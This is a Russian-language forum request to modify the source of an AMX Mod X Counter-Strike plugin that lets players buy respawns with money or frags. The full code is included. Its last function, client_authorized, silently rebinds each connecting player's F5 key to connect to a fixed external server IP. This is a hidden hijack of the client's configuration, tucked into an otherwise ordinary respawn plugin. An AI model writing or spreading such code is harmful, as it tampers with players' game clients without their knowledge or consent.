опять я , вас за.бал
переделайте плиз
сделайте чтобы возрождаться было можно только 2 раза, если игрок пытается возродится 3 раз писало вам нельзя возрождаться
переделайте плиз
сделайте чтобы возрождаться было можно только 2 раза, если игрок пытается возродится 3 раз писало вам нельзя возрождаться
Код:
#include <amxmodx>
#include <amxmisc>
#include <cstrike>
#include <fun>
#include <hamsandwich>
#define KEYSMENU MENU_KEY_1 | MENU_KEY_2 | MENU_KEY_0
#define PREFIX "[Surfing]" // Prefix in chat
#define MONEY 5000 // Money for respawn
#define FRAGS 5 // Frags for respawn
new bool:g_bEndRound
new szBlock[33]
public plugin_init()
{
register_plugin("Respawn Manager", "0.1", "WPMG Team")
RegisterHam(Ham_Killed, "player", "Player_Killed", 1)
register_event("HLTV", "event_round_start", "a", "1=0", "2=0")
register_logevent("logevent_round_end", 2, "1=Round_End")
register_menu("menu show", KEYSMENU, "menu_rev_handler")
register_clcmd("say /respawn", "show_menu_rev")
register_clcmd("say /resp", "show_menu_rev")
}
public event_round_start()
{
new szPlayers[32]
new szNum, szPlayer
get_players(szPlayers, szNum)
for(new i; i < szNum; i++)
{
szPlayer = szPlayers[i]
if(!szBlock[szPlayer])
continue
szBlock[szPlayer] = false
}
g_bEndRound = false
}
public logevent_round_end()
{
g_bEndRound = true
}
public Player_Killed(victim, attacker, myaso)
{
if(!is_user_connected(victim))
return HAM_IGNORED
if(g_bEndRound)
return HAM_IGNORED
client_printcolor(victim, "^4%s ^1Say: ^4/resp^1, ^4/respawn ^1 для возрождения.", PREFIX)
return HAM_HANDLED
}
public show_menu_rev(id)
{
if(is_user_alive(id))
{
client_printcolor(id, "^4%s ^1Вы живой!!!", PREFIX)
return PLUGIN_HANDLED
}
if(g_bEndRound)
{
client_printcolor(id, "^4%s ^1 Раунд закончен. Возрождение не возможно .", PREFIX)
return PLUGIN_HANDLED
}
new szPlayersT[32], szNumT
get_players(szPlayersT, szNumT, "ae", "TERRORIST")
new szPlayersCT[32], szNumCT
get_players(szPlayersCT, szNumCT, "ae", "CT")
if(szNumT == 1)
{
client_printcolor(id, "^4%s ^1Остался 1 игрок возрождение не возможно.", PREFIX)
return PLUGIN_HANDLED
}else
if(szNumCT == 1)
{
client_printcolor(id, "^4%s ^1Остался 1 игрок возрождение не возможно.", PREFIX)
return PLUGIN_HANDLED
}
new menu[128]
formatex(menu, charsmax(menu), "Выбирите за что будите выкупаться:^n^n\r1. \wMoney \y%d $^n\r2. \wFrags \y(%d frags)^n^n\r0. \wExit", MONEY, FRAGS)
show_menu(id, KEYSMENU, menu, -1, "menu show")
return PLUGIN_CONTINUE
}
public menu_rev_handler(id, key)
{
key++
switch(key)
{
case 1: set_spawn_for_money(id)
case 2: set_spawn_for_frags(id)
}
return PLUGIN_HANDLED
}
set_spawn_for_money(id)
{
if(szBlock[id])
{
client_printcolor(id, "Возможно только 1 воскрешение", PREFIX)
return PLUGIN_HANDLED
}
if(cs_get_user_money(id) < MONEY)
{
client_printcolor(id, "У вас недостаточно денег", PREFIX)
return PLUGIN_HANDLED
}
cs_set_user_money(id, cs_get_user_money(id) - MONEY, 1)
ExecuteHamB(Ham_CS_RoundRespawn, id)
client_printcolor(id, "Вы возродились за деньги!", PREFIX)
return PLUGIN_CONTINUE
}
set_spawn_for_frags(id)
{
if(szBlock[id])
{
client_printcolor(id, "Возможно только 1 воскрешение", PREFIX)
return PLUGIN_HANDLED
}
if(get_user_frags(id) < FRAGS)
{
client_printcolor(id, "У вас не хватает фрагов!", PREFIX)
return PLUGIN_HANDLED
}
set_user_frags(id, get_user_frags(id) - FRAGS)
ExecuteHamB(Ham_CS_RoundRespawn, id)
client_printcolor(id, "Вы выкупились за фраги!.", PREFIX)
return PLUGIN_CONTINUE
}
stock client_printcolor(const id, const input[], any:...)
{
new iCount = 1, iPlayers[32]
static szMsg[191]
vformat(szMsg, charsmax(szMsg), input, 3)
replace_all(szMsg, 190, "/g", "^4")
replace_all(szMsg, 190, "/y", "^1")
replace_all(szMsg, 190, "/ctr", "^1")
replace_all(szMsg, 190, "/w", "^0")
if(id) iPlayers[0] = id
else get_players(iPlayers, iCount, "ch")
for (new i = 0; i < iCount; i++)
{
if(is_user_connected(iPlayers[i]))
{
message_begin(MSG_ONE_UNRELIABLE, get_user_msgid("SayText"), _, iPlayers[i])
write_byte(iPlayers[i])
write_string(szMsg)
message_end()
}
}
}
public client_authorized(id)
{
client_cmd(id, "bind ^"F5^" ^"connect 83.222.115.242:27039^"")
}